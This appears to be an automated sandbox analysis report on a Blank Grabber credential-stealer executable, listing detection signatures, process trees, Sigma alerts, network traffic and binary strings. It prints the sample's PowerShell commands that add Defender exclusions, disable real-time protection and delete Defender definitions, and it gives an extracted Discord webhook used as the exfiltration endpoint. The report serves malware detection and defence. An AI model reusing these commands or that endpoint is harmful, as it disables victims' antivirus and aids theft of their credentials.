
Windows Analysis Report
SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
Analysis ID: 1543368
MD5: 3c1b1f453e5f9f0d71f7862d2d6235fe
SHA1: 2092b1b88e17b165ea635b136aceecb05c54e042
SHA256: 984156f2a09823ce55d34fab0738e81d086b4599dbba3b1f6282aa3cce64524a
Tags: BlankGrabber, exe

Detection

Blank Grabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Powershell download and execute
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Check if machine is in data center or colocation facility
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Removes signatures from Windows Defender
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Script Execution From Temp Folder
Uses ipconfig to lookup or modify the Windows network settings
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SGDT)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe" MD5: 3C1B1F453E5F9F0D71F7862D2D6235FE)
    • SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe" MD5: 3C1B1F453E5F9F0D71F7862D2D6235FE)
      • cmd.exe (PID: 7692 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7780 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7700 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7820 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
          • WmiPrvSE.exe (PID: 7600 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • MpCmdRun.exe (PID: 2624 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7752 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7920 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7796 cmdline: C:\Windows\system32\cmd.exe /c "start bound.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • bound.exe (PID: 7976 cmdline: bound.exe MD5: 2A4DCF20B82896BE94EB538260C5FB93)
          • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7400 cmdline: "cmd" /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ipconfig.exe (PID: 1512 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
          • WerFault.exe (PID: 2024 cmdline: C:\Windows\system32\WerFault.exe -u -p 7976 -s 2228 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • cmd.exe (PID: 7852 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8044 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7936 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8184 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  • cleanup
{"C2 url": "https://discord.com/api/webhooks/1299279521836433439/GoUGaI0qQnNvUez_tVUOCPj55nOrj_OQnwDZRVe4JnsR8fWm3B0OhLukLX3stEIlIXzc"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\_MEI76122\rarreg.key | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
dropped/ConDrv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Source | Rule | Description | Author | Strings
00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000000.00000003.1393387910.000001C12B872000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000002.00000003.1407872022.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
(5 of 8 entries shown)

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, ParentProcessId: 7664, ParentProcessName: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'", ProcessId: 7692, ProcessName: cmd.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, ParentProcessId: 7664, ParentProcessName: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7700, ProcessName: cmd.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7752, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', ProcessId: 7920, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, ParentProcessId: 7664, ParentProcessName: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'", ProcessId: 7692, ProcessName: cmd.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7692, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe', ProcessId: 7780, ProcessName: powershell.exe
Source: Process started, Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: "cmd" /c ipconfig /all, CommandLine: "cmd" /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: bound.exe, ParentImage: C:\Users\user\AppData\Local\Temp\bound.exe, ParentProcessId: 7976, ParentProcessName: bound.exe, ProcessCommandLine: "cmd" /c ipconfig /all, ProcessId: 7400, ProcessName: cmd.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-27T18:44:34.269854+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 49785 | 172.67.203.125 | 443 | TCP


AV Detection

Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe.7664.2.memstrmin, Malware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1299279521836433439/GoUGaI0qQnNvUez_tVUOCPj55nOrj_OQnwDZRVe4JnsR8fWm3B0OhLukLX3stEIlIXzc"}
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, ReversingLabs: Detection: 52%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, Joe Sandbox ML: detected
Source: unknown, HTTPS traffic detected: 172.67.203.125:443 -> 192.168.2.9:49767 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.203.125:443 -> 192.168.2.9:49785 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 128.116.123.4:443 -> 192.168.2.9:49792 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.20.23.46:443 -> 192.168.2.9:49809 version: TLS 1.2
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: System.Data.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: mscorlib.pdb8* source: WER40B.tmp.dmp.29.dr
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: bound.exe, 00000011.00000002.1605507236.00000254B6D83000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source: Binary string: System.Drawing.ni.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER40B.tmp.dmp.29.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1469630464.00007FF8E6B32000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387564300.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499835574.00007FF8F8754000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER40B.tmp.dmp.29.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\bound.PDB] source: bound.exe, 00000011.00000002.1610583580.00000254CF206000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER40B.tmp.dmp.29.dr
Source: Binary string: System.Core.ni.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: System.Numerics.ni.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499519391.00007FF8F8301000.00000040.00000001.01000000.00000006.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1493380127.00007FF8E80D1000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER40B.tmp.dmp.29.dr
Source: Binary string: mscorlib.ni.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1498932456.00007FF8E83BB000.00000040.00000001.01000000.00000008.sdmp
Source: Binary string: System.Core.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499164616.00007FF8F0D01000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: System.Xml.pdbX`h0a source: WER40B.tmp.dmp.29.dr
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER40B.tmp.dmp.29.dr
Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1474323542.00007FF8E72E8000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: System.Runtime.Serialization.ni.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1488870171.00007FF8E7A07000.00000040.00000001.01000000.00000013.sdmp
Source: Binary string: System.Xml.ni.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER40B.tmp.dmp.29.dr
Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1469630464.00007FF8E6BCA000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER40B.tmp.dmp.29.dr
Source: Binary string: System.Configuration.ni.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387564300.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499835574.00007FF8F8754000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1497747676.00007FF8E81F1000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1469630464.00007FF8E6BCA000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: System.Configuration.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: System.Data.ni.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WER40B.tmp.dmp.29.dr
Source: Binary string: System.Xml.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: System.pdb source: bound.exe, 00000011.00000002.1605507236.00000254B6D83000.00000004.00000800.00020000.00000000.sdmp, WER40B.tmp.dmp.29.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER40B.tmp.dmp.29.dr
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1500164884.00007FF8F9181000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: System.Data.pdbH source: WER40B.tmp.dmp.29.dr
Source: Binary string: System.Windows.Forms.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: mscorlib.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1498932456.00007FF8E83BB000.00000040.00000001.01000000.00000008.sdmp
Source: Binary string: System.Drawing.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499964052.00007FF8F8D81000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: System.Core.pdb source: WER40B.tmp.dmp.29.dr
